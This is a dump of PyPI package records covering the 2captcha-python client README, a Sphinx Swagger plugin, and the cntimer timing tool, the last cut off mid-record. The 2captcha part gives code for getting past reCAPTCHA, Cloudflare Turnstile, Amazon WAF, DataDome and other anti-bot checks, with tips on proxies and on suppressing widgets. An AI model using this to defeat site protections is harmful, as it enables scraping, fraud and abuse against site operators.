- [ClickCaptcha](#clickcaptcha)
- [Rotate](#rotate)
- [MTCaptcha](#mtcaptcha)
- [Friendly Captcha](#friendly-captcha)
- [Cutcaptcha](#cutcaptcha)
- [Tencent](#tencent)
- [DataDome](#datadome)
- [VKImage](#vkimage)
- [VKCaptcha](#vkcaptcha)
- [CaptchaFox](#captchafox)
- [Prosopo](#prosopo)
- [Temu](#temu)
- [CyberSiARA](#cybersiara)
- [Other methods](#other-methods)
- [send / get\_result](#send--get_result)
- [balance](#balance)
- [report](#report)
- [Error handling](#error-handling)
- [Proxies](#proxies)
- [Async calls](#async-calls)
- [Examples](#examples)
- [Examples using Selenium](#examples-using-selenium)
- [Useful articles](#useful-articles)
- [Get in touch](#get-in-touch)
- [Join the team 👪](#join-the-team-)
- [License](#license)
- [Graphics and Trademarks](#graphics-and-trademarks)
## Installation
This package can be installed with Pip:
```bash
pip3 install 2captcha-python
```
## Configuration
TwoCaptcha instance can be created like this:
```python
from twocaptcha import TwoCaptcha
solver = TwoCaptcha('YOUR_API_KEY')
```
<details>
<summary>Async</summary>
```python
from twocaptcha import AsyncTwoCaptcha
solver = AsyncTwoCaptcha('YOUR_API_KEY')
```
</details>
Also, there are a few options that can be configured:
```python
config = {
'server': '2captcha.com',
'apiKey': 'YOUR_API_KEY',
'softId': 123,
'callback': 'https://your.site/result-receiver',
'defaultTimeout': 120,
'recaptchaTimeout': 600,
'pollingInterval': 10,
'extendedResponse': False
}
solver = TwoCaptcha(**config)
```
### TwoCaptcha instance options
| Option | Default value | Description |
| ---------------- | -------------- |--------------------------------------------------------------------------------------------------------------------------------------------------------|
| server | `2captcha.com` | API server. You can set it to `rucaptcha.com` if your account is registered there |
| softId | 4580 | your software ID obtained after publishing in [2captcha software catalog] |
| callback | - | URL of your web server that receives the captcha recognition result. The URL should be first registered in [pingback settings] of your account |
| defaultTimeout | 120 | Polling timeout in seconds for all captcha types except reCAPTCHA. Defines how long the module tries to get the answer from the `res.php` API endpoint |
| recaptchaTimeout | 600 | Polling timeout for reCAPTCHA in seconds. Defines how long the module tries to get the answer from the `res.php` API endpoint |
| pollingInterval | 10 | Interval in seconds between requests to the `res.php` API endpoint. Setting values less than 5 seconds is not recommended |
| extendedResponse | None | Set to `True` to get the response with additional fields or in more practical format (enables `JSON` response from `res.php` API endpoint). Suitable for [ClickCaptcha](#clickcaptcha), [Canvas](#canvas) |
> [!IMPORTANT]
> Once `callback` is defined for the `TwoCaptcha` instance, all methods return only the captcha ID and DO NOT poll the API to get the result. The result will be sent to the callback URL.
To get the answer manually use [get_result method](#send--get_result)
## Solve captcha
When you submit any image-based CAPTCHA, you can provide additional options to help 2captcha workers solve it properly.
### Captcha options
| Option | Default Value | Description |
| ------------- | ------------- | -------------------------------------------------------------------------------------------------- |
| numeric | 0 | Defines if the captcha contains numeric or other symbols [see more info in the API docs][post options] |
| minLen | 0 | minimal answer length |
| maxLen | 0 | maximum answer length |
| phrase | 0 | defines if the answer contains multiple words or not |
| caseSensitive | 0 | defines if the answer is case sensitive |
| calc | 0 | defines captcha requires calculation |
| lang | - | defines the captcha language; see the [list of supported languages] |
| hintImg | - | an image with a hint shown to workers with the captcha |
| hintText | - | hint or task text shown to workers with the captcha |
Below, you can find basic examples for every captcha type. Check out [examples directory] for more examples with all available options.
### Normal Captcha
<sup>[API method description.](https://2captcha.com/2captcha-api#solving_normal_captcha)</sup>
To bypass a normal captcha (distorted text on an image) use the following method. This method can also be used to recognize any text in an image.
```python
result = solver.normal('path/to/captcha.jpg', param1=..., ...)
# OR
result = solver.normal('https://site-with-captcha.com/path/to/captcha.jpg', param1=..., ...)
```
### Audio Captcha
<sup>[API method description.](https://2captcha.com/2captcha-api#audio)</sup>
Use the following method to bypass an audio captcha (mp3 formats only).
You must provide the language as `lang = 'en'`. Supported languages are "en", "ru", "de", "el", "pt", "fr".
```python
result = solver.audio('path/to/captcha.mp3', lang = 'lang', param1=..., ...)
# OR
result = solver.audio('https://site-with-captcha.com/path/to/captcha.mp3', lang = 'lang', param1=..., ...)
```
### Text Captcha
<sup>[API method description.](https://2captcha.com/2captcha-api#solving_text_captcha)</sup>
This method can be used to bypass a captcha that requires answering a question provided in clear text.
```python
result = solver.text('If tomorrow is Saturday, what day is today?', param1=..., ...)
```
### reCAPTCHA v2
<sup>[API method description.](https://2captcha.com/2captcha-api#solving_recaptchav2_new)</sup>
Use the following method to solve reCAPTCHA V2 and obtain a token to bypass the protection.
```python
result = solver.recaptcha(sitekey='6Le-wvkSVVABCPBMRTvw0Q4Muexq1bi0DJwx_mJ-',
url='https://mysite.com/page/with/recaptcha',
param1=..., ...)
```
### reCAPTCHA v3
<sup>[API method description.](https://2captcha.com/2captcha-api#solving_recaptchav3)</sup>
This method provides a reCAPTCHA V3 solver and returns a token.
```python
result = solver.recaptcha(sitekey='6Le-wvkSVVABCPBMRTvw0Q4Muexq1bi0DJwx_mJ-',
url='https://mysite.com/page/with/recaptcha',
version='v3',
param1=..., ...)
```
### FunCaptcha
<sup>[API method description.](https://2captcha.com/2captcha-api#solving_funcaptcha_new)</sup>
FunCaptcha (Arkoselabs) solving method. Returns a token.
```python
result = solver.funcaptcha(sitekey='6Le-wvkSVVABCPBMRTvw0Q4Muexq1bi0DJwx_mJ-',
url='https://mysite.com/page/with/funcaptcha',
param1=..., ...)
```
### GeeTest
<sup>[API method description.](https://2captcha.com/2captcha-api#solving_geetest)</sup>
Method to solve GeeTest puzzle captcha. Returns a set of tokens as JSON.
```python
result = solver.geetest(gt='f1ab2cdefa3456789012345b6c78d90e',
challenge='12345678abc90123d45678ef90123a456b',
url='https://www.site.com/page/',
param1=..., ...)
```
### GeeTest v4
<sup>[API method description.](https://2captcha.com/2captcha-api#geetest-v4)</sup>
Use this method to solve GeeTest v4. Returns the response in JSON.
```python
result = solver.geetest_v4(captcha_id='e392e1d7fd421dc63325744d5a2b9c73',
url='https://www.site.com/page/',
param1=..., ...)
```
### Lemin Cropped Captcha
<sup>[API method description.](https://2captcha.com/2captcha-api#lemin)</sup>
Use this method to solve the Lemin captcha. Returns JSON with an answer containing the following values: answer, challenge_id.
```python
result = solver.lemin(captcha_id='CROPPED_1abcd2f_a1234b567c890d12ef3a456bc78d901d',
div_id='lemin-cropped-captcha',
url='https://www.site.com/page/',
param1=..., ...)
```
### Yandex Smart
Use this method to solve Yandex Smart Captcha. Returns JSON with the token.
```python
result = solver.yandex_smart(sitekey='0x1AAAAh45AAAAkg0s2VIOD34y5hy4h4h',
url='http://mysite.com/',
proxy={'type': 'HTTPS', 'uri': 'login:password@IP_address:PORT'},
userAgent='Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36')
```
### Cloudflare Turnstile
<sup>[API method description.](https://2captcha.com/2captcha-api#turnstile)</sup>
Use this method to solve Cloudflare Turnstile. Returns JSON with the token.
```python
result = solver.turnstile(sitekey='0x1AAAAAAAAkg0s2VIOD34y5',
url='http://mysite.com/',
data='foo',
pagedata='bar',
action='challenge',
useragent='Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36')
```
### Amazon WAF
<sup>[API method description.](https://2captcha.com/2captcha-api#amazon-waf)</sup>
Use this method to solve Amazon WAF Captcha also known as AWS WAF Captcha is a part of Intelligent threat mitigation for Amazon AWS. Returns JSON with the token.
```python
result = solver.amazon_waf(sitekey='0x1AAAAAAAAkg0s2VIOD34y5',
iv='CgAHbCe2GgAAAAAj',
context='9BUgmlm48F92WUoqv97a49ZuEJJ50TCk9MVr3C7WMtQ0X6flVbufM4n8mjFLmbLVAPgaQ1Jydeaja94iAS49ljb+sUNLoukWedAQZKrlY4RdbOOzvcFqmD/ZepQFS9N5w15Exr4VwnVq+HIxTsDJwRviElWCdzKDebN/mk8/eX2n7qJi5G3Riq0tdQw9+C4diFZU5E97RSeahejOAAJTDqduqW6uLw9NsjJBkDRBlRjxjn5CaMMo5pYOxYbGrM8Un1JH5DMOLeXbq1xWbC17YSEoM1cRFfTgOoc+VpCe36Ai9Kc='
url='https://non-existent-example.execute-api.us-east-1.amazonaws.com/latest'
param1=..., ...)
```
### KeyCaptcha
<sup>[API method description.](https://2captcha.com/2captcha-api#solving_keycaptcha)</sup>
Token-based method to solve KeyCaptcha.
```python
result = solver.keycaptcha(s_s_c_user_id=10,
s_s_c_session_id='493e52c37c10c2bcdf4a00cbc9ccd1e8',
s_s_c_web_server_sign='9006dc725760858e4c0715b835472f22-pz-',
s_s_c_web_server_sign2='2ca3abe86d90c6142d5571db98af6714',
url='https://www.keycaptcha.ru/demo-magnetic/',
param1=..., ...)
```
### atbCAPTCHA
<sup>[API method description.](https://2captcha.com/2captcha-api#atb-captcha)</sup>
Use this method to solve atbCaptcha challenge. Returns a token to bypass the captcha.
```python
result = solver.atb_captcha(app_id='af25e409b33d722a95e56a230ff8771c',
api_server='https://cap.aisecurius.com',
url='http://mysite.com/',
param1=..., ...)
```
### Capy
<sup>[API method description.](https://2captcha.com/2captcha-api#solving_capy)</sup>
Token-based method to bypass Capy puzzle captcha.
```python
result = solver.capy(sitekey='PUZZLE_Abc1dEFghIJKLM2no34P56q7rStu8v',
url='http://mysite.com/',
api_server='https://jp.api.capy.me/',
param1=..., ...)
```
### Grid
<sup>[API method description.](https://2captcha.com/2captcha-api#grid)</sup>
The grid method was originally called the Old reCAPTCHA V2 method. The method can be used to bypass any type of captcha where you can apply a grid on an image and click specific grid boxes. Returns numbers of boxes.
```python
result = solver.grid('path/to/captcha.jpg', param1=..., ...)
```
### Canvas
<sup>[API method description.](https://2captcha.com/2captcha-api#canvas)</sup>
The canvas method can be used when you need to draw a line around an object on an image. Returns a set of points' coordinates to draw a polygon.
```python
result = solver.canvas('path/to/captcha.jpg', param1=..., ...)
```
### ClickCaptcha
<sup>[API method description.](https://2captcha.com/2captcha-api#coordinates)</sup>
The ClickCaptcha method returns the coordinates of points on the captcha image. It can be used if you need to click on particular points in the image.
```python
result = solver.coordinates('path/to/captcha.jpg', param1=..., ...)
```
### Rotate
<sup>[API method description.](https://2captcha.com/2captcha-api#solving_rotatecaptcha)</sup>
This method can be used to solve a captcha that asks to rotate an object. It is mostly used to bypass FunCaptcha. Returns the rotation angle.
```python
result = solver.rotate('path/to/captcha.jpg', param1=..., ...)
```
### MTCaptcha
<sup>[API method description.](https://2captcha.com/2captcha-api#mtcaptcha)</sup>
Use this method to solve MTCaptcha and obtain a token to bypass the protection.
```python
result = solver.mtcaptcha(sitekey='MTPublic-KzqLY1cKH',
url='https://2captcha.com/demo/mtcaptcha',
param1=..., ...)
```
### Friendly Captcha
<sup>[API method description.](https://2captcha.com/2captcha-api#friendly-captcha)</sup>
Friendly Captcha solving method. Returns a token.
> [!IMPORTANT]
> To successfully use the received token, the captcha widget must not be loaded on the page. To do this, you need to abort request to `/friendlycaptcha/...module.min.js` on the page. When the captcha widget is already loaded on the page, there is a high probability that the received token will not work.
```python
result = solver.friendly_captcha(sitekey='FCMGEMUD2KTDSQ5H',
url='https://friendlycaptcha.com/demo',
param1=..., ...)
```
### Cutcaptcha
<sup>[API method description.](https://2captcha.com/2captcha-api#cutcaptcha)</sup>
Use this method to solve Cutcaptcha. Returns the response in JSON.
```python
result = solver.cutcaptcha(misery_key='ad52c87af17e2ec09b8d918c9f00416b1cb8c320',
apikey='SAs61IAI',
url='https://mysite.com/page/with/cutcaptcha',
param1=..., ...)
```
### Tencent
<sup>[API method description.](https://2captcha.com/2captcha-api#tencent)</sup>
Use this method to solve Tencent captcha. Returns a token.
```python
result = solver.tencent(app_id="197326679",
url="https://mysite.com/page/with/tencent",
param1=..., ...)
```
### DataDome
<sup>[API method description.](https://2captcha.com/2captcha-api#datadome)</sup>
Use this method to solve DataDome captcha.
> [!IMPORTANT]
> To solve the DataDome captcha, you must use a proxy. It is recommended to use [residential proxies].
```python
result = solver.datadome(captcha_url="https://geo.captcha-delivery.com/captcha/?initialCid=...",
pageurl="https://mysite.com/page/with/datadome",
userAgent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36",
proxy={
'type': 'HTTP',
'uri': 'login:password@IP_address:PORT'
},
param1=..., ...)
```
### VKImage
<sup>[API method description.](https://2captcha.com/2captcha-api#vkcaptcha)</sup>
This method can be used to solve VK captcha using graphical captcha. Returns the number of steps and solution value in the target site's API format.
```python
result = solver.vkimage('path/to/captcha.jpg', steps='[5,4,7,7,14,22,8,...]', ...)
```
### VKCaptcha
<sup>[API method description.](https://2captcha.com/2captcha-api#vkcaptcha)</sup>
This method can be used to solve VK Captcha using a token. Returns a token.
> [!IMPORTANT]
> To solve the VK Captcha, you must use a proxy. It is recommended to use [residential proxies].
```python
result = solver.vkcaptcha(redirect_uri='https://id.vk.ru/...',
userAgent='Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36..',
proxy={
'type': 'HTTP',
'uri': 'login:password@IP_address:PORT'}
)
```
### CaptchaFox
<sup>[API method description.](https://2captcha.com/2captcha-api#captchafox)</sup>
This method can be used to solve CaptchaFox using a token. Returns a token.
```python
result = solver.captchafox(sitekey='sk_ILKWNruBBVKDOM7dZs59KHnDLEWiH',
pageurl='https://mysite.com/page/with/captchafox',
userAgent='Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36',
proxy={'type': 'HTTPS',
'uri': 'login:password@IP_address:PORT'})
```
### Prosopo
<sup>[API method description.](https://2captcha.com/2captcha-api#prosopo-procaptcha)</sup>
This method can be used to solve Prosopo captcha using a token. Returns a token.
```python
result = solver.prosopo(sitekey='5EZVvsHMrKCFKp5NYNoTyDjTjetoVo1Z4UNNb1DkVLS0JbqR',
pageurl='https://mysite.com/page/with/prosopo'
)
```
### Temu
<sup>[API method description.](https://2captcha.com/ru/2captcha-api#temucaptcha)</sup>
This method can be used to solve Temu captcha. Returns a coordinates.
```python
result = solver.temu(body="data:image/png;base64,iVBORw0KG...",
part1="data:image/png;base64,iVBORw0KG...",
part2="data:image/png;base64,iVBORw0KG...",
part3="data:image/png;base64,iVBORw0KG...")
```
### CyberSiARA
<sup>[API method description.](https://2captcha.com/2captcha-api#cybersiara)</sup>
Use this method to solve CyberSiARA. Returns a token.
```python
result = solver.cybersiara(master_url_id='tpjOCKjjpdzv3d8Ub2E9COEWKt1vl1Mv',
pageurl='https://demo.mycybersiara.com/',
userAgent='Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36',
param1=..., ...)
```
## Other methods
### send / get_result
These methods can be used for manual captcha submission and answer polling. The `send()` method supports sending any captcha
type, to specify the captcha type you must send value `method` manually, for example `method='recaptcha'` for solving reCaptcha.
You can find the value of the `method` parameter in the [API documentation](https://2captcha.com/2captcha-api).
Example for solving Normal captcha manually:
```python
import time
. . . . .
id = solver.send(file='path/to/captcha.jpg')
time.sleep(20)
code = solver.get_result(id)
```
### balance
<sup>[API method description.](https://2captcha.com/2captcha-api#additional-methods)</sup>
Use this method to get your account's balance
```python
balance = solver.balance()
```
### report
<sup>[API method description.](https://2captcha.com/2captcha-api#complain)</sup>
Use this method to report good or bad captcha answers.
```python
solver.report(id, True) # captcha solved correctly
solver.report(id, False) # captcha solved incorrectly
```
## Error handling
In case of an error, the captcha solver throws an exception. It's important to properly handle these cases. We recommend using `try except` to handle exceptions.
The list of all errors can be found in the [API documentation](https://2captcha.com/2captcha-api#list-of-inphp-errors).
```python
try:
result = solver.text('If tomorrow is Saturday, what day is today?')
except ValidationException as e:
# invalid parameters passed
print(e)
except NetworkException as e:
# network error occurred
print(e)
except ApiException as e:
# api respond with error
print(e)
except TimeoutException as e:
# captcha is not solved so far
print(e)
```
## Proxies
You can pass your proxy as an additional argument for the following methods: recaptcha, funcaptcha, geetest, geetest v4,
keycaptcha, capy puzzle, lemin, atbcaptcha, turnstile, amazon waf, mtcaptcha, friendly captcha, cutcaptcha, Tencent, DataDome, cybersiara.
The proxy will be forwarded to the API to solve the captcha.
We have our own proxies that we can offer you. [Buy residential proxies] to avoid restrictions and blocks. [Quick start].
```python
proxy={
'type': 'HTTPS',
'uri': 'login:password@IP_address:PORT'
}
```
## Async calls
To use the async version, just replace `TwoCaptcha` with `AsyncTwoCaptcha`:
```python
import asyncio
from twocaptcha import AsyncTwoCaptcha
async def solve_captcha():
solver = AsyncTwoCaptcha('YOUR_API_KEY')
try:
recaptcha_result = await solver.recaptcha(...)
return recaptcha_result
except Exception as e:
print(e)
return None
if __name__ == '__main__':
result = asyncio.run(solve_captcha())
```
The `AsyncTwoCaptcha` class supports all the same methods and parameters as the synchronous `TwoCaptcha` class but operates asynchronously. Configuration is identical.
### Solving Multiple Captchas in Parallel
One of the main advantages of using async support is the ability to solve multiple captchas concurrently:
```python
async def solve_multiple_captchas():
solver = AsyncTwoCaptcha('YOUR_API_KEY')
# Start all tasks simultaneously
task1 = asyncio.create_task(solver.text('What color is the sky on a clear day?'))
task2 = asyncio.create_task(solver.text('What is 2+2?'))
task3 = asyncio.create_task(solver.text('Name of the planet we live on?'))
# Wait for all tasks to complete
results = await asyncio.gather(task1, task2, task3, return_exceptions=True)
return results
# This completes much faster than solving captchas sequentially
results = asyncio.run(solve_multiple_captchas())
```
Examples of solving all supported captcha types asynchronously are located in the [examples/async directory] directory.
### Legacy Async Method
For backward compatibility, you can also use the traditional executor-based approach with the synchronous client:
```python
import asyncio
import concurrent.futures
from twocaptcha import TwoCaptcha
API_KEY = "YOUR_API_KEY"
image = "data:image/png;base64,iVBORw0KGgoA..."
async def captchaSolver(image):
loop = asyncio.get_running_loop()
with concurrent.futures.ThreadPoolExecutor() as pool:
result = await loop.run_in_executor(pool, lambda: TwoCaptcha(API_KEY).normal(image))
return result
captcha_result = asyncio.run(captchaSolver(image))
```
## Examples
Examples of solving all supported captcha types are located in the [examples] directory.
## Examples using Selenium
Also we have a [separate repository](https://github.com/2captcha/captcha-solver-selenium-python-examples) you can find examples of captcha solving using [Selenium](https://pypi.org/project/selenium/) library. At the moment we have implemented examples of bypassing [reCAPTCHA](https://github.com/2captcha/captcha-solver-selenium-python-examples/tree/main/examples/reCAPTCHA), [Cloudflare](https://github.com/2captcha/captcha-solver-selenium-python-examples/tree/main/examples/cloudflare), [Coordinates](https://github.com/2captcha/captcha-solver-selenium-python-examples/tree/main/examples/coordinates), [MTCaptcha](https://github.com/2captcha/captcha-solver-selenium-python-examples/tree/main/examples/mtcaptcha), [normal captcha](https://github.com/2captcha/captcha-solver-selenium-python-examples/tree/main/examples/normal_captcha) (image captcha) and [text captcha](https://github.com/2captcha/captcha-solver-selenium-python-examples/tree/main/examples/text_captcha) using Selenium.
## Useful articles
- Amazon captcha solver: Code example for bypassing the [Amazon captcha](https://2captcha.com/blog/amazon-captcha-solving)
- [Captcha bypass in Selenium](https://2captcha.com/blog/captcha-bypass-in-selenium)
## Get in touch
<a href="mailto:support@2captcha.com"><img src="https://github.com/user-attachments/assets/539df209-7c85-4fa5-84b4-fc22ab93fac7" width="80" height="30"></a>
<a href="https://2captcha.com/support/tickets/new"><img src="https://github.com/user-attachments/assets/be044db5-2e67-46c6-8c81-04b78bd99650" width="81" height="30"></a>
## Join the team 👪
There are many ways to contribute, of which development is only one! Find your next job. Open positions: AI experts, scrapers, developers, technical support, and much more! 😍
<a href="mailto:job@2captcha.com"><img src="https://github.com/user-attachments/assets/36d23ef5-7866-4841-8e17-261cc8a4e033" width="80" height="30"></a>
## License
The code in this repository is licensed under the MIT License. See the [LICENSE](./LICENSE) file for more details.
### Graphics and Trademarks
The graphics and trademarks included in this repository are not covered by the MIT License. Please contact <a href="mailto:support@2captcha.com">support</a> for permissions regarding the use of these materials.
<!-- Shared links for README.md -->
[2Captcha]: https://2captcha.com/
[2captcha software catalog]: https://2captcha.com/software
[pingback settings]: https://2captcha.com/setting/pingback
[post options]: https://2captcha.com/2captcha-api#normal_post
[list of supported languages]: https://2captcha.com/2captcha-api#language
[examples directory]: /examples
[examples/sync directory]: /examples/sync
[examples/async directory]: /examples/async
[asyncio]: https://docs.python.org/3/library/asyncio.html
[Buy residential proxies]: https://2captcha.com/proxy/residential-proxies
[Quick start]: https://2captcha.com/proxy?openAddTrafficModal=true
[examples]: ./examples
[residential proxies]: https://2captcha.com/proxy/residential-proxies
| text/markdown | 2Captcha | info@2captcha.com | null | null | null | 2captcha, captcha, api, captcha solver, reCAPTCHA, FunCaptcha, Geetest, image captcha, Coordinates, Click Captcha, Geetest V4, Lemin captcha, Amazon WAF, Cloudflare Turnstile, Capy Puzzle, MTCaptcha, Friendly Captcha, Tencent, Cutcaptcha, DataDome, VK Captcha, CaptchaFox, Prosopo, cybersiara | [
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Topic :: Software Development :: Libraries :: Python Modules",
"Topic :: Scientific/Engineering :: Image Recognition",
"Topic :: Utilities",
"Intended Audience :: Developers"
] | [] | https://github.com/2captcha/2captcha-python/ | null | >=3.8 | [] | [] | [] | [
"requests",
"httpx",
"aiofiles"
] | [] | [] | [] | [] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T09:10:23.251190 | 2captcha_python-2.0.3.tar.gz | 36,545 | fb/b0/afb4f221ca65a2b8c9ee0849f9c61448110a35c09e65ecdf97e469cf8897/2captcha_python-2.0.3.tar.gz | source | sdist | null | false | 7bb5f3399d0fd34a8b32f0c856cc0797 | 3ed0f79bacdeb24eb3decb842aad63ec58a2df75ec16f1b9dd143cded1c227b0 | fbb0afb4f221ca65a2b8c9ee0849f9c61448110a35c09e65ecdf97e469cf8897 | null | [
"LICENSE"
] | 4,181 |
2.4 | swagger-plugin-for-sphinx | 7.0.0 | Sphinx plugin which renders a OpenAPI specification with Swagger | [](https://api.reuse.software/info/github.com/SAP/swagger-plugin-for-sphinx)
[](https://github.com/psf/black)
[](https://coveralls.io/github/SAP/swagger-plugin-for-sphinx)
# Swagger Plugin for Sphinx
This is a handy plugin to bring [Swagger](https://swagger.io/) and [Sphinx](https://www.sphinx-doc.org/en/master/) together.
It can generate one or multiple swagger HTML pages with a custom configuration that hosts an OpenAPI specification.
## Install
Just run `pip install swagger-plugin-for-sphinx`
## Usage
### Enable the Plugin
First, add the plugin to the extensions list:
```python
extensions = ["swagger_plugin_for_sphinx"]
```
### Global Configuration
Swagger uses two JavaScript and one CSS file to render the output.
These can be set in ``conf.py``:
```python
swagger_present_uri = ""
swagger_bundle_uri = ""
swagger_css_uri = ""
```
These correspond to the modules explained [here](https://github.com/swagger-api/swagger-ui/blob/master/docs/usage/installation.md).
By default, the latest release is used from [here](https://cdn.jsdelivr.net/npm/swagger-ui-dist@latest).
### Directive
To include a Swagger API specification into an HTML page specify the `swagger-plugin` directive
and the relative path to the specification:
```code
.. swagger-plugin:: path/to/spec.yaml
```
The spec is automatically copied into the `_static` build output directory.
The directive supports the following options
* `id`: specifies an unique ID for the specification per page (see below)
* `full-page`: if set, all other content on the page is dropped and only the Swagger part is rendered
* `page-title`: the name of the HTML page if `full-page` is specified
* `swagger-options`: JSON string that is passed to Swagger to enable additional options as described
on the [configuration](https://swagger.io/docs/open-source-tools/swagger-ui/usage/configuration/)
page of the Swagger documentation.
By default, the directive creates a `<div>` element with the ID `swagger-ui-container`.
If you put more than one `swagger-plugin` directive in a file, specify unique IDs:
```code
.. swagger-plugin:: path/to/one.yaml
:id: spec-one
.. swagger-plugin:: path/to/two.yaml
:id: spec-two
```
## Development
This project uses `uv`.
To setup a venv for development use
`python3.14 -m venv venv && pip install uv && uv sync --all-groups && rm -rf venv/`.
Then use `source .venv/bin/activate` to activate your venv.
## Build and Publish
Execute the release action with the proper version.
## Support, Feedback, Contributing
This project is open to feature requests/suggestions, bug reports etc., via [GitHub issues](https://github.com/SAP/<your-project>/issues). Contribution and feedback are encouraged and always welcome. For more information about how to contribute, the project structure, as well as additional contribution information, see our [Contribution Guidelines](CONTRIBUTING.md).
## Code of Conduct
We as members, contributors, and leaders pledge to make participation in our community a harassment-free experience for everyone. By participating in this project, you agree to abide by its [Code of Conduct](CODE_OF_CONDUCT.md) at all times.
## Licensing
Copyright 2025 SAP SE or an SAP affiliate company and swagger-plugin-for-sphinx contributors.
Please see our [LICENSE](LICENSE) for copyright and license information.
Detailed information including third-party components and their licensing/copyright information is available [via the REUSE tool](https://api.reuse.software/info/github.com/SAP/<your-project>).
| text/markdown | null | Kai Harder <kai.harder@sap.com> | null | null | null | sphinx, swagger, plugin, openapi | [
"Development Status :: 5 - Production/Stable",
"Environment :: Plugins",
"Framework :: Sphinx :: Extension",
"Intended Audience :: Developers",
"Natural Language :: English",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3 :: Only",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Programming Language :: Python :: 3.14",
"Topic :: Documentation",
"Topic :: Documentation :: Sphinx",
"Typing :: Typed"
] | [] | null | null | <4,>=3.10 | [] | [] | [] | [
"sphinx<10,>=8.0",
"jinja2~=3.0",
"docutils",
"typing_extensions~=4.5"
] | [] | [] | [] | [
"Changelog, https://github.com/SAP/swagger-plugin-for-sphinx/blob/main/CHANGELOG.md",
"Issue Tracker, https://github.com/SAP/swagger-plugin-for-sphinx/issues"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T09:10:17.859324 | swagger_plugin_for_sphinx-7.0.0.tar.gz | 106,931 | fc/14/36a4b2172fd6496c646d58dcb11c2877e09cc38e6d206eaa822dad0d0eab/swagger_plugin_for_sphinx-7.0.0.tar.gz | source | sdist | null | false | ce8661cad7f13cd9e6e6b830b0650ff9 | 86a18b9ec1da2b78a80772fbd5d10549bf393b072f07da9edb5d1eaac02b8d44 | fc1436a4b2172fd6496c646d58dcb11c2877e09cc38e6d206eaa822dad0d0eab | Apache-2.0 | [
"LICENSE"
] | 591 |
2.4 | cntimer | 0.1.11 | Automatic execution time and memory tracker for Python scripts — works with VSCode, terminal, and every Python runner automatically. | # cntimer ⏱
[](https://pypi.org/project/cntimer/)
[](https://opensource.org/licenses/MIT)
[](https://www.python.org/downloads/)
[](https://pypi.org/project/cntimer/)
**Automatic execution time and memory tracker for Python scripts.**
No code changes. No config. Just `pip install cntimer` — every script you run will automatically show timing and memory at the end, whether you use VSCode, terminal, or any Python runner.
---
## Install
```bash
pip install cntimer
```
That's it. Every Python script you run will show this automatically:
```
────────────────────────────────────────────────────────────
🕐 Time 0.74 ms (execution: 1.44 s)
📦 Memory 31.2 MB (peak: 62.4 MB)
────────────────────────────────────────────────────────────
```
> ✅ Works in base Python, virtual environments (venv), conda, and pipx — no extra steps needed.
---
## How it works
`cntimer` places a `cntimer.pth` file into your Python's `site-packages` directory. Python automatically reads all `.pth` files on **every startup** — which is what makes tracking work with zero code changes.
When you uninstall with `pip uninstall cntimer`, the `.pth` hook removes itself automatically on the next Python startup — no orphaned files, no errors.
- ✅ Works with VSCode Run button
- ✅ Works in terminal
- ✅ Works in virtual environments (venv, conda, pipx)
- ✅ Works on Windows (x86, x64, ARM64), macOS, Linux
- ✅ No imports needed in your code
- ✅ Cleans up after itself on uninstall
---
## Output explained
| Field | Meaning |
|---|---|
| 🕐 Time | CPU time — actual computation (excludes sleep, I/O, network wait) |
| execution | Total execution time (how long you waited) |
| 📦 Memory | Memory still in use when script finished |
| peak | Highest memory used at any point during execution |
If **Time** is much bigger than **cpu**, your script spent time waiting (file I/O, network, sleep).
If they're close, your script is CPU-bound (pure computation).
---
## Manual install (if auto-install failed)
Find your site-packages path:
```bash
# Mac / Linux
python3 -c "import site; print(site.getsitepackages()[0])"
# Windows
python -c "import site; print(site.getsitepackages()[0])"
```
Then copy the file:
### macOS
```bash
cp cntimer.pth $(python3 -c "import site; print(site.getsitepackages()[0])")/cntimer.pth
```
### Linux
```bash
sudo cp cntimer.pth $(python3 -c "import site; print(site.getsitepackages()[0])")/cntimer.pth
```
### Windows 64-bit / ARM64 — run Command Prompt as Administrator
```
copy cntimer.pth "C:\Program Files\Python3xx\Lib\site-packages\cntimer.pth"
```
### Windows 32-bit — run Command Prompt as Administrator
```
copy cntimer.pth "C:\Program Files (x86)\Python3xx\Lib\site-packages\cntimer.pth"
```
> Replace `3xx` with your Python version (e.g. `312` for Python 3.12).
---
## Uninstall
```bash
pip uninstall cntimer
```
The `.pth` hook removes itself automatically on the next Python startup. No manual cleanup needed.
---
## License
[MIT](LICENSE) © 2026 tokitahmidtoufa
| text/markdown | tokitahmidtoufa | null | null | null | null | timer, profiler, memory, performance, benchmark, execution time, developer tools, debugging | [
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"Intended Audience :: Education",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Programming Language :: Python :: 3.14",
"Topic :: Software Development :: Debuggers",
"Topic :: Software Development :: Libraries :: Python Modules",
"Topic :: System :: Benchmark",
"Operating System :: OS Independent"
] | [] | null | null | >=3.7 | [] | [] | [] | [] | [] | [] | [] | [
"Homepage, https://github.com/tokitahmidtoufa/cntimer",
"Repository, https://github.com/tokitahmidtoufa/cntimer",
"Bug Tracker, https://github.com/tokitahmidtoufa/cntimer/issues",
